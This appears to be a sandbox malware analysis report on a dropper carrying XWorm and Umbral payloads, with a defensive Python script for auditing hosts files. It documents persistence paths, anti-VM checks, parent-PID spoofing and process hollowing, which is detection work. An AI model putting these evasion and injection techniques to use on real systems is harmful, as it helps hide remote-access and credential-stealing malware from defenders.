Malware Analysis Report

2024-10-10 09:55

Sample ID 240708-wax71atand
Target rootkit.exe
SHA256 f01ae2632bb62a8f559472eaa31a863b82a04821dbdf8adbda7dab3db14d41cc
Tags umbral xworm execution persistence rat spyware stealer trojan evasion
Score 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score 10/10

SHA256 f01ae2632bb62a8f559472eaa31a863b82a04821dbdf8adbda7dab3db14d41cc

Threat Level: Known bad

The file rootkit.exe was found to be: Known bad.

In the behavioral run rootkit.exe (PID 4376) acts as a dropper: it starts two payloads from the user's Temp directory, www.DeadSecObbbfuscation.exe (PID 4056) and Modify.exe (PID 1980), starts C:\ProgramData\www.DeadSec0000000000-obfusecator.exe (PID 3580) and registers that file in the user's Run key, and spawns schtasks.exe. The behaviour recorded for www.DeadSecObbbfuscation.exe (a Run value and a Startup shortcut named XClient, PowerShell children) is consistent with the XWorm RAT, whose default client name is XClient; a scheduled task named XClient is also registered. The behaviour recorded for Modify.exe (hosts file modification, hardware enumeration through wmic.exe, external IP lookup via ip-api.com and traffic to discord.com) is consistent with the Umbral stealer. Separately, a PowerShell instance running under the LocalSystem profile (powershell.EXE, PID 1912) creates a process with winlogon.exe (PID 616) as the recorded parent and both writes into and sets the thread context of dllhost.exe (PID 2656), the parent-PID spoofing plus process hollowing pattern. The signature tables below are the evidence for each of these statements.

Malicious Activity Summary

umbral xworm execution persistence rat spyware stealer trojan evasion

Modifies security service

Xworm

Suspicious use of NtCreateUserProcessOtherParentProcess

Detect Xworm Payload

Umbral

Detect Umbral payload

Drops file in Drivers directory

Command and Scripting Interpreter: PowerShell

Checks BIOS information in registry

Drops startup file

Reads user/profile data of web browsers

Executes dropped EXE

Checks computer location settings

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in System32 directory

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Detects videocard installed

Enumerates system info in registry

Scheduled Task/Job: Scheduled Task

Uses Task Scheduler COM API

Checks SCSI registry key(s)

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Modifies data under HKEY_USERS

Suspicious use of SendNotifyMessage

Modifies registry class

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported 2024-07-08 17:43

Signatures

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

The static pass records only that the PE carries no Authenticode signature; everything else on this page comes from the behavioral run.

Analysis: behavioral2

Detonation Overview

Submitted 2024-07-08 17:43
Reported 2024-07-08 17:47
Platform win10v2004-20240704-en
Max time kernel 150s
Max time network 125s

Command Line

winlogon.exe

Signatures

Detect Umbral payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A (2 hits)

Detect Xworm Payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A (4 hits)

The sandbox records these payload matches without a process or indicator, so the family attribution rests on the hits themselves together with the behaviour recorded in the tables below.

Suspicious use of NtCreateUserProcessOtherParentProcess

Description | Indicator | Process | Target
PID 1912 created 616 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe

powershell.EXE (PID 1912) created a process whose recorded parent is winlogon.exe (PID 616) rather than PowerShell itself. This is the parent-PID spoofing pattern: the creator passes PROC_THREAD_ATTRIBUTE_PARENT_PROCESS so that the new process appears under a trusted system process in any tool that reads only the parent PID. Telemetry that records the creating process separately from the parent is needed to tie the child back to PowerShell; here the SetThreadContext and WriteProcessMemory rows below, which still name PID 1912, do that job.

Umbral

stealer umbral

Xworm

trojan rat xworm

Drops file in Drivers directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\Modify.exe | N/A

Modify.exe opens the hosts file for writing. The report records the open but not the content written; stealers of this kind typically append entries that map security-vendor domains to a loopback or unspecified address, so the non-comment entries of the file should be reviewed on an affected host. Writing to this path requires administrative rights, so a successful write implies Modify.exe ran elevated.
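To see what a hosts modification like the one above actually did, the following added example (not part of the report or of any tool it mentions) parses a hosts file and lists every mapping that is not the stock localhost entry, separating sinkholed names from redirected ones. The file content is constructed for the example and uses reserved .invalid names; the vendor domains that Umbral-style stealers block are not reproduced here.

```python
"""List the non-default mappings in a Windows hosts file.  Added example for
the hosts modification recorded above; not part of the report or of any tool
it names."""
import ipaddress

# The shipped Windows hosts file maps localhost only in comments (the resolver
# handles it itself), so a live localhost line is harmless and ignored.
DEFAULT_NAMES = {"localhost"}
# Addresses that make a name unreachable: the 'block the vendor' pattern.
SINKHOLE_ADDRESSES = {"0.0.0.0", "127.0.0.1", "::1"}


def parse_hosts(text):
    """Return (address, hostname) pairs, ignoring comments and blank lines.
    Malformed lines are skipped, as the Windows resolver skips them."""
    entries = []
    for raw in text.splitlines():
        fields = raw.split("#", 1)[0].split()  # drop trailing comments
        if not fields:
            continue
        try:
            addr = str(ipaddress.ip_address(fields[0]))
        except ValueError:
            continue
        entries.extend((addr, name.lower()) for name in fields[1:])
    return entries


def suspicious_entries(text):
    """Classify every non-default mapping as 'blocked' (points at a loopback
    or unspecified address) or 'redirected' (points at a real address)."""
    findings = []
    for addr, name in parse_hosts(text):
        if name in DEFAULT_NAMES:
            continue
        kind = "blocked" if addr in SINKHOLE_ADDRESSES else "redirected"
        findings.append((kind, name, addr))
    return findings


# Constructed sample: the shipped comment block plus three appended lines
# using reserved .invalid names (real vendor domains are not reproduced).
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
# 127.0.0.1       localhost
# ::1             localhost
0.0.0.0 example-av-update.invalid   # appended by the sample
127.0.0.1\tTelemetry.Example.invalid
10.0.0.5 login.example.invalid
"""

if __name__ == "__main__":
    for kind, name, addr in suspicious_entries(SAMPLE_HOSTS):
        print(f"{kind:10} {name} -> {addr}")
```

The 'redirected' class matters as much as the 'blocked' one: a real address in front of a login domain is a credential-capture setup rather than an evasion measure, and both are cleaned up by restoring the file to its shipped content.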

Checks BIOS information in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Windows\system32\wbem\wmiprvse.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\wbem\wmiprvse.exe | N/A

The reads are performed by wmiprvse.exe, the WMI provider host, on behalf of a WMI client. The visible WMI clients in this run are the wmic.exe children of Modify.exe, although the PowerShell instances could equally issue WMI queries. BIOS date and version strings are standard inputs for virtual-machine and sandbox fingerprinting.

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-587429654-1855694383-2268796072-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\rootkit.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-587429654-1855694383-2268796072-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe | N/A

Both the dropper and the XWorm payload read the user's configured country (Geo\Nation), the value geofenced malware checks before deciding whether to run. The same read is commonly triggered by .NET runtime culture initialisation, so on its own it is weak evidence.

Drops startup file

Description | Indicator | Process | Target
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk | C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk | C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe | N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-587429654-1855694383-2268796072-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\www.DeadSec0000000000-obfusecator = "C:\\ProgramData\\www.DeadSec0000000000-obfusecator.exe" | C:\Users\Admin\AppData\Local\Temp\rootkit.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-587429654-1855694383-2268796072-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" | C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe | N/A

Two per-user Run values are written under the logged-on user's hive (SID S-1-5-21-...-1000): the dropper registers its ProgramData copy and the XWorm payload registers XClient.exe in %APPDATA%. Together with the Startup shortcut and the XClient scheduled task this gives three independent autostart paths, all of which have to be removed.

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | discord.com | N/A | N/A (2 hits)

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | ip-api.com | N/A | N/A

The network signatures are recorded by domain only, with no process attribution. Connections to discord.com and ip-api.com from a process other than a browser or the Discord client are the observable to hunt for. If the discord.com traffic is a webhook post, the webhook path would identify the attacker's channel, but the report captures only the domain.

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 | C:\Windows\system32\svchost.exe | N/A
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
File opened for modification | C:\Windows\System32\Tasks\XClient | C:\Windows\system32\svchost.exe | N/A

The svchost.exe rows are service activity: the event log service appending to the Security-Mitigations logs, the CryptoAPI URL cache under the LocalSystem profile, and the Task Scheduler service writing the definition of the task named XClient (C:\Windows\System32\Tasks is where registered tasks are stored). The two powershell.EXE rows matter more: a non-interactive PowerShell profile and a CLR usage log under config\systemprofile show that this PowerShell instance runs as LocalSystem, i.e. it was started by a service or a scheduled task, not from the user's session.

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 1912 set thread context of 2656 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe

The same LocalSystem PowerShell instance (PID 1912) sets the thread context of dllhost.exe (PID 2656), into which it also writes memory five times (see the WriteProcessMemory table). Writing a payload into a freshly created, suspended process and then redirecting its thread is process hollowing; dllhost.exe, a signed Microsoft COM surrogate, is a common host because its presence draws little attention. The dllhost.exe hits under EnumeratesProcesses below are best read as the injected code's activity, since a COM surrogate has no reason to walk the process list on its own.

Enumerates physical storage devices

Checks SCSI registry key(s)

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\{HardwareID, CompatibleIDs, DeviceDesc, ConfigFlags, Service, Mfg, FriendlyName} | C:\Windows\system32\wbem\wmiprvse.exe | N/A (7 rows)
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 and its LogConf subkey | C:\Windows\system32\wbem\wmiprvse.exe | N/A (2 rows)
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\{CompatibleIDs, FriendlyName, DeviceDesc, Mfg, Service, ConfigFlags, HardwareID} | C:\Windows\system32\wbem\wmiprvse.exe | N/A (7 rows)
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 and its LogConf subkey | C:\Windows\system32\wbem\wmiprvse.exe | N/A (2 rows)

The eighteen original rows are the WMI provider host enumerating the two SCSI devices of the analysis VM (a disk with vendor string DADY and a QEMU DVD-ROM) in response to a client query, consistent with a WMI lookup of the disk and CD-ROM drive classes. The vendor strings are exactly what anti-VM code compares against lists of known hypervisor identifiers (QEMU, VMware, VBOX), so these reads should be treated as evasion, not as storage access.

Detects videocard installed

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A

The video-controller query runs through wmic.exe, which Modify.exe spawns four times (PIDs 5056, 5084, 1808 and 2104 in the WriteProcessMemory table); the wmic command lines themselves are not reproduced in this report. Graphics adapter name, BIOS strings, SCSI vendor strings and the system Identifier form a typical sandbox-detection profile, and the same values are the usual content of a stealer's system-information report.

Modifies data under HKEY_USERS

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\{Root, Disallowed, CA, trust, TrustedPeople, SmartCardRoot}, each with its Certificates, CRLs and CTLs subkeys | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A (24 rows)
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\{CA, Disallowed, TrustedPeople, trust}, each with its Certificates, CRLs and CTLs subkeys | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A (16 rows)
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0, ...\16.0\Common, ...\Common\ClientTelemetry, ...\ClientTelemetry\RulesMetadata, ...\RulesMetadata\officeclicktorun.exe, ...\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A (6 rows)
Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe and \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A (2 rows)
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1720460785" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A

The 53 original rows collapse to the groups above. \REGISTRY\USER\.DEFAULT is the hive of the LocalSystem account; the certificate-store keys are created automatically the first time a process under that account touches CryptoAPI, so these rows confirm that powershell.EXE runs as SYSTEM rather than showing any tampering with trust settings (nothing is written into the stores). The OfficeClickToRun.exe and svchost.exe rows are background service activity on the analysis image and unrelated to the sample.

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\Explorer.EXE | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-587429654-1855694383-2268796072-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" | C:\Windows\system32\sihost.exe | N/A

Both rows are attributed to shell components (Explorer.EXE and sihost.exe), not to the sample or its children; no COM class registration by the malware is recorded.

Scheduled Task/Job: Scheduled Task

persistence execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\schtasks.exe | N/A (2 hits)

schtasks.exe is started by rootkit.exe (PID 1248 in the WriteProcessMemory table) and a task named XClient appears under C:\Windows\System32\Tasks (System32 table). The task's trigger and action are not reproduced in this report and should be read from the task XML on an infected host before it is deleted.

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A (20 hits)
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A (3 hits)
N/A | N/A | C:\Windows\System32\dllhost.exe | N/A (39 hits)
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Modify.exe | N/A (2 hits)

The 64 original rows are collapsed by process. The two spellings of the PowerShell image (powershell.exe for the user-session instances started by rootkit.exe, Modify.exe and www.DeadSecObbbfuscation.exe; powershell.EXE for the LocalSystem instance, PID 1912) are preserved from the report and are the only way to tell the two groups apart in this table. The dllhost.exe count stands out: a COM surrogate has no reason to walk the process list repeatedly, so these hits are best attributed to the code hollowed into it by PID 1912.

Suspicious behavior: GetForegroundWindowSpam

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\Explorer.EXE | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Modify.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A (7 hits)
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A (three bursts of 21, 21 and 12 rows; the last burst is cut off after SeShutdownPrivilege)

The 64 original rows are collapsed by process. wmic.exe enables this fixed set of privileges on its own token at start-up regardless of the query it runs (entries 33 to 36 are privilege LUIDs the sandbox did not resolve to names), so the wmic rows carry no signal on their own. The rows that matter are the SeDebugPrivilege enables by the two dropped executables and by every PowerShell instance: SeDebugPrivilege is what a process needs to open and write other processes' memory, and it is the prerequisite for the dllhost.exe injection recorded above.

Suspicious use of FindShellTrayWindow

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\Explorer.EXE | N/A (2 hits)

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 4376 wrote to memory of 4056 (2 writes) | N/A | C:\Users\Admin\AppData\Local\Temp\rootkit.exe | C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
PID 4376 wrote to memory of 1980 (2 writes) | N/A | C:\Users\Admin\AppData\Local\Temp\rootkit.exe | C:\Users\Admin\AppData\Local\Temp\Modify.exe
PID 4376 wrote to memory of 4724 (2 writes) | N/A | C:\Users\Admin\AppData\Local\Temp\rootkit.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4376 wrote to memory of 1248 (2 writes) | N/A | C:\Users\Admin\AppData\Local\Temp\rootkit.exe | C:\Windows\System32\schtasks.exe
PID 4376 wrote to memory of 3580 (3 writes) | N/A | C:\Users\Admin\AppData\Local\Temp\rootkit.exe | C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
PID 1980 wrote to memory of 1300, 3808, 2372, 1400 and 1688 (2 writes each) | N/A | C:\Users\Admin\AppData\Local\Temp\Modify.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1980 wrote to memory of 5056, 5084, 1808 and 2104 (2 writes each) | N/A | C:\Users\Admin\AppData\Local\Temp\Modify.exe | C:\Windows\System32\Wbem\wmic.exe
PID 4056 wrote to memory of 1812, 3996, 2728 and 3496 (2 writes each) | N/A | C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1912 wrote to memory of 2656 (5 writes) | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe

The 42 original rows, collapsed per parent/child pair, give the process tree of the run:

rootkit.exe (4376)
  www.DeadSecObbbfuscation.exe (4056)
    powershell.exe (1812, 3996, 2728, 3496)
  Modify.exe (1980)
    powershell.exe (1300, 3808, 2372, 1400, 1688)
    wmic.exe (5056, 5084, 1808, 2104)
  powershell.exe (4724)
  schtasks.exe (1248)
  C:\ProgramData\www.DeadSec0000000000-obfusecator.exe (3580)
powershell.EXE (1912, LocalSystem)
  dllhost.exe (2656)

A parent writing into a child it has just created is reported by this signature for every spawned process, so most rows simply document the tree. The exception is the last pair: the five writes from powershell.EXE (1912) into dllhost.exe (2656), combined with the SetThreadContext row for the same pair, are the injection. powershell.EXE has no recorded parent in this run, consistent with it being started by the scheduled task or another service-side trigger rather than by a process in the tree.
PID 1912 wrote to memory of 2656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1912 wrote to memory of 2656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1912 wrote to memory of 2656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2656 wrote to memory of 616 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\winlogon.exe
PID 2656 wrote to memory of 672 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsass.exe
PID 2656 wrote to memory of 960 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2656 wrote to memory of 384 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\dwm.exe
PID 2656 wrote to memory of 720 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2656 wrote to memory of 1044 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 2656 wrote to memory of 1128 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 2656 wrote to memory of 1152 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 2656 wrote to memory of 1168 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2656 wrote to memory of 1204 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2656 wrote to memory of 1304 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2656 wrote to memory of 1320 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2656 wrote to memory of 1372 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2656 wrote to memory of 1412 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2656 wrote to memory of 1440 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2656 wrote to memory of 1592 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2656 wrote to memory of 1600 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 2656 wrote to memory of 1656 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 2656 wrote to memory of 1724 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\svchost.exe

